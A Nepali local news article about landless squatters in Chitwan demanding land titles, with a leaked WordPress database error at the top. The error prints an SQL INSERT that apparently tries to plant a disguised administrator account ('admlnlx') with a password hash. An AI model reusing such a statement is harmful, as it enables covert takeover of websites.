WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$ByRY9h7jY9Q35mqyLzjbrvYAGSCft4.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 08:34:17', '', 'admlnlx', 'admlnlx')
चितवन, पुस १२–
चितवन क्षेत्र नम्बर ४ का सकुम्बासी बासीन्दाहरुले सुकुम्बासी समस्यालाई जति सक्दो छिटो समाधान गर्न माग गरेका छन् । लालपुर्जा नभएका कारण विवाह दर्ता, जन्मदर्तालगायतका सरकारी सेवा सुबिधाबाट बञ्चित हुनुपरेको भन्दै उनीहरुले समस्या समाधानको माग गरेका हुन् ।
सुकुम्बासी समस्या समाधान पहल समिती क्षेत्र नं.४ ले आज आयोजना गरेको बैठकमा उपस्थित क्षेत्र नं४ का सुकुम्बासीहरुले यस्तो माग गरेका हुन् । सुकुम्बासी भएकै कारण आफुहरुलाई सम्पूर्ण क्षेत्रमा समस्या भएको उनिहरुले गुनासो गरेका छन् । कार्यक्रमका प्रमुख अतिथी साँसद रामकृष्ण घिमिरेले सुकुम्बासी समुदायको समस्या समाधानका लागि छिट्टै पहल गर्ने प्रतिबद्धता जनाए । सुकुम्बासीहरुलाई उनिहरुले उपभोग गर्दै आएको जग्गाको नाप अनुसार नै जग्गा उपलब्ध गराउन सक्दो पहल गर्ने उनले बताए । यस्तै कार्यक्रममा बोल्दै सुकुम्बासी समाधान पहल समितीका जिल्ला संयोजक रामबहादुर नेपालीले सुकुम्बासी समस्या समाधानका लागि स्थानिय निकायसंग पहल गर्न आवश्यक रहेको बताए । २०३६ सालदेखि सो क्षेत्रमा बिना लालपुर्जा बसोबास गर्दै आएका सुकुम्बासीहरुलाई छिटो भन्दा छिटो व्यवस्थापन गर्नुपर्नेमा उनले जोड दिए । कार्यक्रममा सुकुम्बासी समाधान पहल समिती क्षेत्र नं.४का संयोजक भिमबहादुर दर्जीको अध्यक्षता रहेको कार्यक्रममा समाजसेवी गुणराज पाठक र वडा प्रतिनिधि ओमप्रसाद पोखरेल लगायतको उपस्थिती रहेको थियो ।